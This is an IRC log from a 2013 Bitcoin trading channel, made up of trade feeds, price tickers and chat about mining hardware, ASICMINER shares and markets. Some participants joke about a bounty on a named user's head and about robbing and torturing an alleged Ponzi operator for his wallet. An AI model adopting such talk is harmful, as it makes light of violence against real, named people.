gamble I'd play S.DICE Feb 18 20:25:47 :) Feb 18 20:25:47 o nice. Feb 18 20:25:49 lol Feb 18 20:25:52 :) Feb 18 20:26:03 my poker skills aren't that great though Feb 18 20:26:05 meh im missing the thrill Feb 18 20:26:12 withc s.dice Feb 18 20:26:18 with* Feb 18 20:26:25 why are you missing it? is it down? Feb 18 20:26:31 no i mean Feb 18 20:26:40 i miss the excitement when playing Feb 18 20:26:48 since its like instant Feb 18 20:26:58 so there is no adrenaline rush Feb 18 20:26:59 ah, yeah Feb 18 20:27:03 like when i short btc Feb 18 20:27:04 :D Feb 18 20:27:17 :) Feb 18 20:27:31 gotta run, bbl Feb 18 20:27:35 enjoy, later Feb 18 20:29:16 [MPEX] [S.MPOE] 6700 @ 0.00067068 = 4.4936 BTC [+] Feb 18 20:29:18 [MPEX] [S.MPOE] 350 @ 0.00066435 = 0.2325 BTC [-] Feb 18 20:30:47 btw ill prolly mention this several times along the way Feb 18 20:30:59 mpex -> sierra chart almost working. Feb 18 20:35:52 [BTCTC] [GSDPT] 10 @ 0.0063 = 0.063 BTC [-] Feb 18 20:39:43 ;;bc,stats Feb 18 20:39:45 Current Blocks: 221876 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1899 blocks | Next Difficulty In About: 1 week, 4 days, 15 hours, 36 minutes, and 26 seconds | Next Difficulty Estimate: 4058614.30824 | Estimated Percent Change: 11.1641 Feb 18 20:47:14 [MPEX] [S.MPOE] 3000 @ 0.0006581 = 1.9743 BTC [-] Feb 18 20:47:15 [MPEX] [S.MPOE] 2055 @ 0.00065809 = 1.3524 BTC [-] Feb 18 20:49:53 [MPEX] [S.MPOE] 2700 @ 0.00065809 = 1.7768 BTC [-] Feb 18 20:55:59 [MPEX] [S.MPOE] 4321 @ 0.00065959 = 2.8501 BTC [+] Feb 18 20:56:01 [MPEX] [S.MPOE] 8679 @ 0.00065973 = 5.7258 BTC [+] Feb 18 21:06:15 [BTCTC] [COGNITIVE] 1 @ 0.345 BTC [+] Feb 18 21:13:19 [HAVELOCK] [HIM] 1 @ 13.7 BTC [-] Feb 18 21:13:21 [HAVELOCK] [HIM] 1 @ 13.6 BTC [-] Feb 18 21:17:11 [MPEX] [S.MPOE] 1404 @ 0.00065973 = 0.9263 BTC [+] Feb 18 21:18:43 [MPEX] [S.DICE] 1000 @ 0.00669999 = 6.7 BTC [+] Feb 18 21:18:45 [MPEX] [S.DICE] 1000 @ 0.0067 = 6.7 BTC [+] Feb 18 21:18:49 [MPEX] [S.DICE] 1000 @ 0.006885 = 6.885 BTC [+] Feb 18 21:18:59 [MPEX] [S.DICE] 1000 @ 0.00689 = 6.89 BTC [+] Feb 18 21:19:01 [MPEX] [S.DICE] 1000 @ 0.006895 = 6.895 BTC [+] Feb 18 21:22:19 [HAVELOCK] [SDICE] 39 @ 0.7125 = 27.7875 BTC [+] Feb 18 21:22:21 [HAVELOCK] [SDICE] 7 @ 0.71 = 4.97 BTC [-] Feb 18 21:22:22 [HAVELOCK] [SDICE] 4 @ 0.70799999 = 2.832 BTC [-] Feb 18 21:22:37 [MPEX] [S.MPOE] 14796 @ 0.00066488 = 9.8376 BTC [+] Feb 18 21:22:59 [BTCTC] [COGNITIVE] 2 @ 0.3315 = 0.663 BTC [-] Feb 18 21:23:02 [BTCTC] [COGNITIVE] 2 @ 0.3315 = 0.663 BTC [-] Feb 18 21:23:54 [BTCTC] [COGNITIVE] 2 @ 0.331 = 0.662 BTC [-] Feb 18 21:24:38 [MPEX] [S.MPOE] 1300 @ 0.00065988 = 0.8578 BTC [-] Feb 18 21:26:41 [MPEX] [S.MPOE] 2870 @ 0.00065809 = 1.8887 BTC [-] Feb 18 21:26:43 [MPEX] [S.MPOE] 4321 @ 0.0006549 = 2.8298 BTC [-] Feb 18 21:26:46 [MPEX] [S.MPOE] 6309 @ 0.00065489 = 4.1317 BTC [-] Feb 18 21:27:58 [BTCTC] [COGNITIVE] 5 @ 0.33 = 1.65 BTC [-] Feb 18 21:29:09 [MPEX] [S.MPOE] 1730 @ 0.00065489 = 1.133 BTC [-] Feb 18 21:29:11 [MPEX] [S.MPOE] 2561 @ 0.0006544 = 1.6759 BTC [-] Feb 18 21:29:27 [MPEX] [S.MPOE] 10230 @ 0.00065409 = 6.6913 BTC [-] Feb 18 21:29:29 [MPEX] [S.MPOE] 1879 @ 0.00065256 = 1.2262 BTC [-] Feb 18 21:29:46 [BTCTC] [GSDPT] 20 @ 0.0063 = 0.126 BTC [-] Feb 18 21:30:55 [BTCTC] [GSDPT] 2 @ 0.00624 = 0.0125 BTC [-] Feb 18 21:34:03 [MPEX] [S.MPOE] 97 @ 0.00065988 = 0.064 BTC [+] Feb 18 21:34:55 [BTCTC] [GSDPT] 68 @ 0.0061 = 0.4148 BTC [-] Feb 18 21:36:57 [MPEX] [S.MPOE] 3603 @ 0.00067079 = 2.4169 BTC [+] Feb 18 21:36:59 [MPEX] [S.MPOE] 1700 @ 0.00065257 = 1.1094 BTC [-] Feb 18 21:37:03 [MPEX] [S.MPOE] 1584 @ 0.00065256 = 1.0337 BTC [-] Feb 18 21:38:57 [MPEX] [S.MPOE] 10600 @ 0.00065256 = 6.9171 BTC [-] Feb 18 21:41:27 [BTCTC] [COGNITIVE] 14 @ 0.33 = 4.62 BTC [-] Feb 18 21:41:29 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [-] Feb 18 21:42:03 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Feb 18 21:43:30 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 18 21:45:19 [HAVELOCK] [SDICE] 1 @ 0.70799999 BTC [-] Feb 18 21:47:03 [MPEX] [S.MPOE] 3000 @ 0.00067361 = 2.0208 BTC [+] Feb 18 21:47:07 [MPEX] [S.MPOE] 4321 @ 0.00067362 = 2.9107 BTC [+] Feb 18 21:47:09 [MPEX] [S.MPOE] 479 @ 0.00067363 = 0.3227 BTC [+] Feb 18 21:47:43 1 BTC = 26.82000 U.S. dollars = 20.0478397 Euros Feb 18 21:49:13 [MPEX] [S.MPOE] 4321 @ 0.00065959 = 2.8501 BTC [-] Feb 18 21:49:15 [MPEX] [S.MPOE] 7879 @ 0.00065948 = 5.196 BTC [-] Feb 18 21:50:41 [MPEX] [S.MPOE] 2371 @ 0.00065948 = 1.5636 BTC [-] Feb 18 21:50:43 [MPEX] [S.MPOE] 1126 @ 0.00065257 = 0.7348 BTC [-] Feb 18 21:51:03 kakobrekla: that sounds cool. I'd love to reverse engineer MT4's protocol and get mtgox on that, no margin trading though... Feb 18 21:51:54 hehe reverse mt4 hehe Feb 18 21:55:53 [MPEX] [S.MPOE] 4321 @ 0.0006735 = 2.9102 BTC [+] Feb 18 21:55:55 [MPEX] [S.MPOE] 5279 @ 0.00067363 = 3.5561 BTC [+] Feb 18 21:56:33 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 18 22:03:01 kakobrekla: heh http://stackoverflow.com/questions/1776726/how-can-i-reverse-engineer-a-network-protocol-metatrader-4 Feb 18 22:10:10 [BTCTC] [COGNITIVE] 1 @ 0.3799 BTC [+] Feb 18 22:14:33 [MPEX] [S.MPOE] 11050 @ 0.00067268 = 7.4331 BTC [-] Feb 18 22:14:35 [MPEX] [S.MPOE] 4250 @ 0.00067238 = 2.8576 BTC [-] Feb 18 22:34:57 [MPEX] [S.MPOE] 4242 @ 0.00067363 = 2.8575 BTC [+] Feb 18 22:34:59 [MPEX] [S.MPOE] 1126 @ 0.00067363 = 0.7585 BTC [+] Feb 18 22:35:01 [MPEX] [S.MPOE] 2432 @ 0.00067363 = 1.6383 BTC [+] Feb 18 22:38:31 [MPEX] [S.MPOE] 3382 @ 0.00067238 = 2.274 BTC [-] Feb 18 22:41:53 [MPEX] [S.MPOE] 1100 @ 0.00067363 = 0.741 BTC [+] Feb 18 22:44:00 [MPEX] [S.MPOE] 789 @ 0.00067363 = 0.5315 BTC [+] Feb 18 22:44:04 [MPEX] [S.MPOE] 12579 @ 0.00067385 = 8.4764 BTC [+] Feb 18 22:44:06 [MPEX] [S.MPOE] 3878 @ 0.00067435 = 2.6151 BTC [+] Feb 18 22:44:08 [MPEX] [S.MPOE] 5949 @ 0.00067437 = 4.0118 BTC [+] Feb 18 22:44:54 [MPEX] [S.MPOE] 2468 @ 0.00067238 = 1.6594 BTC [-] Feb 18 22:45:16 [MPEX] [S.MPOE] 11800 @ 0.00066543 = 7.8521 BTC [-] Feb 18 22:51:38 volume is shit Feb 18 22:51:40 28k Feb 18 22:52:10 :/ Feb 18 22:54:59 3-day weekend in US Feb 18 22:55:35 no banks, i know. Feb 18 22:55:48 any media poke will be delayed till wed/thurs Feb 18 22:56:15 reddit / mega media may hit big. but a lot of their users are also broke. Feb 18 22:56:23 curious to see Feb 18 22:57:00 [MPEX] [S.DICE] 1000 @ 0.006895 = 6.895 BTC [+] Feb 18 22:57:02 [MPEX] [S.DICE] 4000 @ 0.0069 = 27.6 BTC [+] Feb 18 22:57:50 I have a feeling it will mostly serve to help us keep pace Feb 18 22:58:12 i'm not convinced reddit and mega will bring a huge increase Feb 18 22:58:20 [HAVELOCK] [SDICE] 50 @ 0.7 = 35 BTC [-] Feb 18 22:58:28 not to say that our current pace isn't plenty :) Feb 18 22:58:56 our pace is roughly 25 coins every 10 minutes. no other pace matters Feb 18 22:59:10 :) Feb 18 22:59:48 [MPEX] [S.DICE] 5000 @ 0.0069 = 34.5 BTC [+] Feb 18 23:00:20 [HAVELOCK] [SDICE] 50 @ 0.7 = 35 BTC [-] Feb 18 23:00:56 [MPEX] [S.DICE] 10000 @ 0.0069 = 69 BTC [+] Feb 18 23:00:59 if everybody started selling and nobody bought, you might be concerned about pace Feb 18 23:01:09 but maybe not Feb 18 23:01:20 [HAVELOCK] [SDICE] 100 @ 0.7 = 70 BTC [-] Feb 18 23:07:20 [HAVELOCK] [SDICE] 1 @ 0.682 BTC [-] Feb 18 23:08:55 not so much Feb 18 23:10:52 [MPEX] [S.MPOE] 31051 @ 0.00067437 = 20.9399 BTC [+] Feb 18 23:10:53 [MPEX] [S.MPOE] 11711 @ 0.00067476 = 7.9021 BTC [+] Feb 18 23:10:56 [MPEX] [S.MPOE] 16350 @ 0.0006753 = 11.0412 BTC [+] Feb 18 23:11:01 [MPEX] [S.MPOE] 2100 @ 0.00067692 = 1.4215 BTC [+] Feb 18 23:11:04 [MPEX] [S.MPOE] 4218 @ 0.00067854 = 2.8621 BTC [+] Feb 18 23:11:07 [MPEX] [S.MPOE] 31350 @ 0.00067855 = 21.2725 BTC [+] Feb 18 23:11:08 [MPEX] [S.MPOE] 3220 @ 0.00067884 = 2.1859 BTC [+] Feb 18 23:19:28 [MPEX] [S.MPOE] 3900 @ 0.00066543 = 2.5952 BTC [-] Feb 18 23:20:01 this is exactly right: http://i.imgur.com/YHGMhIi.jpg Feb 18 23:21:53 o well thats new pizzaman1337 Feb 18 23:21:55 didnt know. Feb 18 23:29:35 [MPEX] [S.MPOE] 10050 @ 0.00066282 = 6.6613 BTC [-] Feb 18 23:31:07 ;;bc,stats Feb 18 23:31:10 Current Blocks: 221902 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1873 blocks | Next Difficulty In About: 1 week, 4 days, 11 hours, 46 minutes, and 44 seconds | Next Difficulty Estimate: 4194096.00714 | Estimated Percent Change: 14.8749 Feb 18 23:49:26 [MPEX] [S.MPOE] 4 @ 0.00066398 = 0.0027 BTC [+] Feb 18 23:53:16 [MPEX] [S.MPOE] 246 @ 0.00066398 = 0.1633 BTC [+] Feb 18 23:53:17 [MPEX] [S.MPOE] 8254 @ 0.00067536 = 5.5744 BTC [+] Feb 18 23:58:11 [MPEX] [S.MPOE] 3500 @ 0.00066282 = 2.3199 BTC [-] Feb 18 23:58:15 [MPEX] [S.MPOE] 2055 @ 0.00066034 = 1.357 BTC [-] Feb 19 00:00:10 [MPEX] [S.MPOE] 9348 @ 0.00066034 = 6.1729 BTC [-] Feb 19 00:00:12 [MPEX] [S.MPOE] 1681 @ 0.0006595 = 1.1086 BTC [-] Feb 19 00:07:05 [MPEX] [S.MPOE] 953 @ 0.00067536 = 0.6436 BTC [+] Feb 19 00:07:06 [MPEX] [S.MPOE] 1847 @ 0.00067683 = 1.2501 BTC [+] Feb 19 00:24:09 [MPEX] [S.MPOE] 5200 @ 0.00067132 = 3.4909 BTC [-] Feb 19 00:35:03 [MPEX] [S.MPOE] 3316 @ 0.00067201 = 2.2284 BTC [+] Feb 19 00:35:13 [MPEX] [S.MPOE] 1884 @ 0.00067682 = 1.2751 BTC [+] Feb 19 00:43:52 [MPEX] [S.MPOE] 8700 @ 0.00067132 = 5.8405 BTC [-] Feb 19 00:50:21 [HAVELOCK] [SDICE] 2 @ 0.71 = 1.42 BTC [+] Feb 19 00:51:01 [MPEX] [S.MPOE] 2153 @ 0.00067132 = 1.4454 BTC [-] Feb 19 00:51:03 [MPEX] [S.MPOE] 647 @ 0.00067131 = 0.4343 BTC [-] Feb 19 00:51:19 [HAVELOCK] [SDICE] 2 @ 0.725 = 1.45 BTC [+] Feb 19 00:59:03 [MPEX] [S.MPOE] 3500 @ 0.00067682 = 2.3689 BTC [+] Feb 19 01:08:04 [MPEX] [S.MPOE] 4400 @ 0.00067131 = 2.9538 BTC [-] Feb 19 01:16:51 [MPEX] [S.MPOE] 2700 @ 0.00067682 = 1.8274 BTC [+] Feb 19 01:31:36 [MPEX] [S.MPOE] 5503 @ 0.00067131 = 3.6942 BTC [-] Feb 19 01:32:03 [MPEX] [S.MPOE] 3438 @ 0.00066492 = 2.286 BTC [-] Feb 19 01:38:12 [MPEX] [S.MPOE] 3801 @ 0.00067682 = 2.5726 BTC [+] Feb 19 01:41:03 [MPEX] [S.MPOE] 1441 @ 0.00066492 = 0.9581 BTC [-] Feb 19 02:37:38 ;;ticker Feb 19 02:37:39 BTCUSD ticker | Best bid: 26.81116, Best ask: 26.99895, Bid-ask spread: 0.18779, Last trade: 26.81115, 24 hour volume: 28146.94767573, 24 hour low: 26.36268, 24 hour high: 27.14800, 24 hour vwap: 26.77014 Feb 19 02:38:01 volume 'steady' at 28,000. I wonder what that includes Feb 19 03:01:46 rally Feb 19 03:06:30 fuck Feb 19 03:06:36 my bank is closed Feb 19 03:15:35 ;;ticker Feb 19 03:15:36 BTCUSD ticker | Best bid: 27.00512, Best ask: 27.00614, Bid-ask spread: 0.00102, Last trade: 27.00614, 24 hour volume: 36837.64498059, 24 hour low: 26.36268, 24 hour high: 27.43194, 24 hour vwap: 26.88400 Feb 19 03:15:43 heh. Feb 19 03:16:45 stupid banks Feb 19 03:16:52 i give them my money so they can invest it Feb 19 03:16:54 .. Feb 19 03:17:11 banks, paypal, never ends Feb 19 03:17:14 they wont even answer my call Feb 19 03:17:37 btw I was able to secure Avalon no 2 Feb 19 03:17:48 trying to replace the spent coins Feb 19 03:19:53 [BTCTC] [SYNERGY] 1 @ 0.11979 BTC [+] Feb 19 03:40:38 [MPEX] [S.MPOE] 2471 @ 0.00066492 = 1.643 BTC [-] Feb 19 03:41:04 [MPEX] [S.MPOE] 7950 @ 0.00066116 = 5.2562 BTC [-] Feb 19 03:41:09 [MPEX] [S.MPOE] 7179 @ 0.00065992 = 4.7376 BTC [-] Feb 19 03:45:46 when's the delivery ? Feb 19 03:46:33 [MPEX] [S.MPOE] 9950 @ 0.00066693 = 6.636 BTC [+] Feb 19 03:46:35 [MPEX] [S.MPOE] 1600 @ 0.00067682 = 1.0829 BTC [+] Feb 19 03:48:36 [BTCTC] [SYNERGY] 1 @ 0.08596 BTC [-] Feb 19 03:48:42 march 5 to april 5th Feb 19 03:51:02 2013-2015 Feb 19 03:52:00 [BTCTC] [S.MPOE-PT] 9 @ 0.00068 = 0.0061 BTC [+] Feb 19 03:59:50 ;;ticker Feb 19 03:59:50 BTCUSD ticker | Best bid: 27.55000, Best ask: 27.59900, Bid-ask spread: 0.04900, Last trade: 27.59900, 24 hour volume: 47556.91667849, 24 hour low: 26.36268, 24 hour high: 27.60000, 24 hour vwap: 27.02661 Feb 19 03:59:57 go bitch go. Feb 19 04:01:40 go down Feb 19 04:01:58 no u go down Feb 19 04:02:17 NO U Feb 19 04:04:23 ;;seen smickles Feb 19 04:04:23 smickles was last seen in #bitcoin-assets 1 week, 2 days, 23 hours, 53 minutes, and 42 seconds ago: pong Feb 19 04:04:24 :( Feb 19 04:04:39 mircea_popescu: I am putting a bounty out for you! Feb 19 04:05:04 did you send him an email? Feb 19 04:06:09 no in general I want to put out a bounty for mircea_popescu and see how many bounty hunters come forth Feb 19 04:06:43 depends what you got to offer really Feb 19 04:07:07 we'll start the bidding at 1000 btc's Feb 19 04:07:18 bidding? Feb 19 04:07:24 is this a reverse auction? Feb 19 04:07:32 YESSIR for the head of mircea_popescu Feb 19 04:07:33 "ill kill him for 5btc only srs" Feb 19 04:07:46 XD Feb 19 04:08:14 first sign a message with key holding 1k btc Feb 19 04:08:27 until then best to stfu. Feb 19 04:10:35 i kno rite Feb 19 04:11:11 ;;bc,stats Feb 19 04:11:14 Current Blocks: 221932 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1843 blocks | Next Difficulty In About: 1 week, 4 days, 12 hours, 27 minutes, and 0 seconds | Next Difficulty Estimate: 4156078.98122 | Estimated Percent Change: 13.83363 Feb 19 04:14:43 ;;ticker Feb 19 04:14:44 BTCUSD ticker | Best bid: 27.51000, Best ask: 27.77000, Bid-ask spread: 0.26000, Last trade: 27.50000, 24 hour volume: 50030.24095015, 24 hour low: 26.36268, 24 hour high: 27.77000, 24 hour vwap: 27.05526 Feb 19 04:14:56 y u slow. Feb 19 04:15:16 ;;ticker Feb 19 04:15:17 BTCUSD ticker | Best bid: 27.63282, Best ask: 27.98430, Bid-ask spread: 0.35148, Last trade: 27.98430, 24 hour volume: 51414.05905568, 24 hour low: 26.36268, 24 hour high: 27.98430, 24 hour vwap: 27.07812 Feb 19 04:15:45 27.9 lulz Feb 19 04:15:51 aaaand down Feb 19 04:16:08 ya possibly Feb 19 04:16:19 under 22 we get fucked. Feb 19 04:17:01 take a smell of this tho http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 19 04:18:17 pff Feb 19 04:18:24 inb4 $2 Feb 19 04:18:33 hehe Feb 19 04:19:46 ;;ticker Feb 19 04:19:47 BTCUSD ticker | Best bid: 27.68020, Best ask: 27.78485, Bid-ask spread: 0.10465, Last trade: 27.78486, 24 hour volume: 51511.72136611, 24 hour low: 26.36268, 24 hour high: 27.98430, 24 hour vwap: 27.07960 Feb 19 04:21:17 IT IS TIME! Feb 19 04:21:30 People will at last get their 33ish something =/ Feb 19 04:21:44 y u so sad Feb 19 04:22:01 who was it here that bought in at $32? Feb 19 04:22:10 smickles oslt Feb 19 04:22:10 smickles did Feb 19 04:22:12 i sold at that. Feb 19 04:23:13 not this time. Feb 19 04:27:10 is it high enough at least ? Feb 19 04:27:17 no Feb 19 04:30:27 [BTCTC] [SYNERGY] 1 @ 0.04011 BTC [-] Feb 19 04:32:25 ;;ticker Feb 19 04:32:26 BTCUSD ticker | Best bid: 27.66000, Best ask: 27.69987, Bid-ask spread: 0.03987, Last trade: 27.66000, 24 hour volume: 52255.95488875, 24 hour low: 26.36268, 24 hour high: 27.98430, 24 hour vwap: 27.09083 Feb 19 04:34:10 would anybody be interested in purchasing my remaining shares of ASICMINER? Feb 19 04:34:16 I only have 76 shares left Feb 19 04:34:30 .1 sure Feb 19 04:34:35 haha Feb 19 04:34:44 who put the wall up at 28?? :) Feb 19 04:34:50 I'm looking to sell at .4 Feb 19 04:34:50 pirate Feb 19 04:35:20 I haven't been as active as I used to be, pirate's pretty much fled the community right Feb 19 04:35:31 21:32:36 <+amphipod> Feb19 02:32:15 mtgox x117 2,494.8955 @ 27.9846635 USD Feb 19 04:35:46 i think you can find a buyer at .4 if you look for a while Feb 19 04:36:00 pirate logs onto the forum from time to time Feb 19 04:36:30 there's an auction that started at that price, I'm confident the shares are worth that much, unfortunately I'm not as confident about the short-term prospects of bitcoin's price :[ Feb 19 04:37:31 [MPEX] [S.MPOE] 485 @ 0.00065992 = 0.3201 BTC [-] Feb 19 04:37:50 rally!!! Feb 19 04:38:02 [MPEX] [S.MPOE] 10819 @ 0.0006595 = 7.1351 BTC [-] Feb 19 04:40:10 Chaang-Noi: did you read about pirate supposedly being in Thailand? Feb 19 04:41:41 yeah Feb 19 04:41:51 bcb would not tell me the hotel where so i could no go check Feb 19 04:42:04 so i assumed it was just bcb trolling Feb 19 04:42:27 if you found pirate what would you do? Feb 19 04:42:54 rob him Feb 19 04:42:54 lol Feb 19 04:42:59 I'd cut little bits off him till he gave up wallet Feb 19 04:44:46 I got no beef with pirate, I haven't really fell for his scam Feb 19 04:45:08 it woulda been nice to ride his ponzi and cash out before he shuts it down though Feb 19 04:45:42 I've got no beef either but its not like he's gonna go to the cops Feb 19 04:46:07 if I see him here in vancouver id keep tabs on him Feb 19 04:46:22 get a $$$ reward for his info Feb 19 04:52:21 [HAVELOCK] [SDICE] 10 @ 0.69880001 = 6.988 BTC [-] Feb 19 05:09:27 ;;ticker Feb 19 05:09:28 BTCUSD ticker | Best bid: 27.71173, Best ask: 27.97757, Bid-ask spread: 0.26584, Last trade: 27.97922, 24 hour volume: 59300.63225777, 24 hour low: 26.36268, 24 hour high: 28.00000, 24 hour vwap: 27.19648 Feb 19 05:10:53 [MPEX] [S.MPOE] 7596 @ 0.00065948 = 5.0094 BTC [-] Feb 19 05:10:59 [MPEX] [S.MPOE] 5800 @ 0.00066072 = 3.8322 BTC [+] Feb 19 05:11:02 [MPEX] [S.MPOE] 4515 @ 0.00067682 = 3.0558 BTC [+] Feb 19 05:11:04 [MPEX] [S.MPOE] 4389 @ 0.00067683 = 2.9706 BTC [+] Feb 19 05:20:04 [MPEX] [S.MPOE] 29752 @ 0.0006563 = 19.5262 BTC [-] **** BEGIN LOGGING AT Tue Feb 19 13:33:27 2013 Feb 19 13:33:57 ;;ticker Feb 19 13:33:57 BTCUSD ticker | Best bid: 27.54000, Best ask: 27.54999, Bid-ask spread: 0.00999, Last trade: 27.54000, 24 hour volume: 71099.00472553, 24 hour low: 26.48000, 24 hour high: 28.21686, 24 hour vwap: 27.44215 Feb 19 13:41:48 soo... amazonses has no antispam policy ? Feb 19 13:41:48 spam detected Feb 19 13:42:00 new rule "if from contains amazonses.com discard message". Feb 19 14:22:02 http://incognito.mobi/trileme-in-timisoara Feb 19 14:22:03 le woot. Feb 19 14:23:21 cel mai bun blog yo Feb 19 14:25:08 dats me! Feb 19 14:25:14 whatever i do ends up da best! Feb 19 14:27:19 there any montreal people around this joint? Feb 19 14:29:40 auction for asicminer about an hour left if anyone wants in https://bitcointalk.org/index.php?topic=144574.0 Feb 19 14:30:51 why was mt gox broken? Feb 19 14:39:57 Chaang-Noi broken ? huh ? Feb 19 14:55:54 Breaking related news. BFL will ship a few this month maybe but only if all goes well. lol. Feb 19 14:55:55 https://forums.butterflylabs.com/blogs/bfl_jody/85-perennial-question-when-will-my-order-ship.html Feb 19 14:56:01 mp mt gox was failing hard Feb 19 14:56:07 their db failed for like 20 mins Feb 19 14:56:16 mp go check the charts Feb 19 14:57:31 mtogxlive shows a gap, indeed Feb 19 14:58:00 hai Feb 19 14:58:32 interesting thought - if mtgox fell flat like in 2011, would price get up or down? Feb 19 15:00:05 DeaDTerra was last seen in #bitcoin-assets 4 days, 17 hours, 1 minute, and 16 seconds ago: 2200 Ghash ^^ go ASICMINER! Feb 19 15:00:15 DeaDTerra1 was last seen in #bitcoin-assets 1 week, 5 days, 17 hours, 36 minutes, and 54 seconds ago: so the purchaser breaks the law not the provider Feb 19 15:11:45 bfl has 6000 chips that they hope to ship by june... this means even at best they will only ship out 27 TH? wont asicminer at 62TH kill them? Feb 19 15:13:32 is my math at all right here? Feb 19 15:15:38 yeah but if you have 80% of the gpus... Feb 19 15:15:38 ;;ticker Feb 19 15:15:39 BTCUSD ticker | Best bid: 28.40000, Best ask: 28.62899, Bid-ask spread: 0.22899, Last trade: 28.63000, 24 hour volume: 78935.86425330, 24 hour low: 26.48000, 24 hour high: 28.72649, 24 hour vwap: 27.55929 Feb 19 15:16:28 it will be Feb 19 15:16:58 but did i do my math right, bfl can only have 26 th at best, and asicminer odds are will ahve 62th? Feb 19 15:17:24 i think thats too far out in the future to predict Feb 19 15:17:27 that means asicminer will ahve like 70% of the network and like 1.5 btc per share just in the first year? Feb 19 15:17:52 bfl only has 6000 chips, each chip can only do 60 ghash Feb 19 15:18:58 but bfl has a nother wafer on the way Feb 19 15:19:05 and more afte rthat Feb 19 15:19:48 and the value of BTC will keep GPU miners in the game longer Feb 19 15:19:56 just too many factors Feb 19 15:20:40 hmm Feb 19 15:20:44 i have little faith in bfl Feb 19 15:20:54 i half expect it to not even work Feb 19 15:21:42 entirely possibel sadly Feb 19 15:21:49 possible* Feb 19 15:23:16 i did not loan money to bfl so i really hope they fail Feb 19 15:24:06 yeah.. i quit doing that after pirate lol Feb 19 15:24:13 is silver/btc at parity yet? Feb 19 15:24:30 awesome, glad to hear it. Feb 19 15:24:47 $1.50 differance now Feb 19 15:25:28 It will, Gwern's SilkRoad/BTC article was on Hacker News later last night. Feb 19 15:25:43 Pluss Reddit for Reddit gold plus Mega resellers Feb 19 15:25:50 it should be a good week. Feb 19 15:32:23 can't watch any at work. i need that script that saves all urls in a log. Feb 19 15:33:53 ;;ticker Feb 19 15:33:54 BTCUSD ticker | Best bid: 28.41552, Best ask: 28.56999, Bid-ask spread: 0.15447, Last trade: 28.56999, 24 hour volume: 79333.36692833, 24 hour low: 26.48000, 24 hour high: 28.74018, 24 hour vwap: 27.57128 Feb 19 15:34:12 gonna break 32 this week?! Feb 19 15:34:22 ok, i'll put it in my email. Feb 19 15:35:08 why go with silver and not gold? Feb 19 15:40:48 ;;ticker Feb 19 15:40:48 BTCUSD ticker | Best bid: 28.40001, Best ask: 28.49998, Bid-ask spread: 0.09997, Last trade: 28.40000, 24 hour volume: 79717.09388889, 24 hour low: 26.48000, 24 hour high: 28.74018, 24 hour vwap: 27.57592 Feb 19 15:42:50 ok, great. i sent it to my email so I can watch when I get home. Feb 19 15:49:16 interesting. Feb 19 15:51:33 we'll mine asteroids for silver should that happen Feb 19 15:54:42 chinease peasants already burn old computers for the metals. it's a very healthy profession. Feb 19 15:54:46 chinese* Feb 19 15:54:50 Chinese* Feb 19 15:55:47 big ask walls went up all the way to 30 Feb 19 15:56:04 usagi i agree with you but the 50x is a bit too high, wont happen 1/10 ratio is the best we will ever see in our life times is my guess Feb 19 15:56:05 aaaaaaand they're gone. removed. Feb 19 15:57:02 lol Feb 19 16:04:26 silver has only gone over gold in recent history once and that was for 1 year in spain like 600 years ago Feb 19 16:04:36 i dont thin kwe will equal again Feb 19 16:04:51 gold has that marketing thing going :) Feb 19 16:05:29 and even if there is more gold above dound, that gold is stored in giant safes, the silver is floating, the real market is much higher with silver Feb 19 16:05:44 my sister had gold on her wedding cake Feb 19 16:06:05 i dont know, but i shat gold the next day... Feb 19 16:07:44 i want 10k btc pizza Feb 19 16:10:10 usagi how much coin did you melt into silver Feb 19 16:11:06 i did not pay Feb 19 16:11:16 he got two pizzas for 10k Feb 19 16:11:32 bitcoin to silver right? Feb 19 16:11:34 how much? Feb 19 16:11:49 how much coins you sold for it? Feb 19 16:11:54 yeah im selling silver to get btc/ltc :) Feb 19 16:12:06 in btc? Feb 19 16:12:28 what? Feb 19 16:12:55 ask him Feb 19 16:13:05 lol this is progressing nicely Feb 19 16:18:05 who is suprised that usagi mails his shit? Feb 19 16:18:29 pigeons :D Feb 19 16:18:55 usagi there are many of them note the 's' Feb 19 16:19:17 more bird, more brain i guess Feb 19 16:19:17 we are many Feb 19 16:19:40 i always assumed it was a borg kinda thing Feb 19 16:19:53 whre only 1 connection is needed for all of the fleet Feb 19 16:21:07 hi kakobrekla, where's assbot? Feb 19 16:21:24 having sex Feb 19 16:21:46 with whom? gribble's here Feb 19 16:22:26 ;;slap assbot Feb 19 16:22:39 da fuck is an inspissated Feb 19 16:24:38 lol BFL ads on my Facebook Feb 19 16:25:47 or twatter Feb 19 16:26:58 is evil evil? yes! Feb 19 16:27:50 evil is not evil. it's cool. Feb 19 16:31:52 good i'm not btc developer, this is real evil, both sides just rehashing their arguments: https://bitcointalk.org/index.php?topic=144895.0 Feb 19 16:32:24 [HAVELOCK] [KCIM] 15 @ 0.99 = 14.85 BTC [-] Feb 19 16:32:58 like, i'm big miner, i'll mine gigabyte block, now 15% of network can't process it and drops off, so i have 15% more part of network Feb 19 16:33:10 no it does NOT work that way Feb 19 16:33:32 ;;bc,stats Feb 19 16:33:44 Current Blocks: 222013 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1762 blocks | Next Difficulty In About: 1 week, 4 days, 3 hours, 38 minutes, and 44 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 19 16:33:46 one must take into account the block must be propagated successfully first Feb 19 16:33:52 but i gave up.... Feb 19 16:34:16 centralization of what? Feb 19 16:34:25 control Feb 19 16:34:51 all actors are strongly motivated to keep own copy of blockchain and thus control Feb 19 16:36:53 *rolls eyes* Feb 19 16:37:07 usagi: could you resend the link you mentioned regarding silver? Feb 19 16:37:36 i will store it.. why not? Feb 19 16:38:25 i'll buy bigger hdd for 30 bucks Feb 19 16:38:40 or a ssd for 300 Feb 19 16:38:45 (0.1 btc at that point) Feb 19 16:40:01 obviously, we'll get some king of tiered storage once things go into petabytes Feb 19 16:41:18 i don;t understaid it either... the "centralized" word lost a meaning completely by now Feb 19 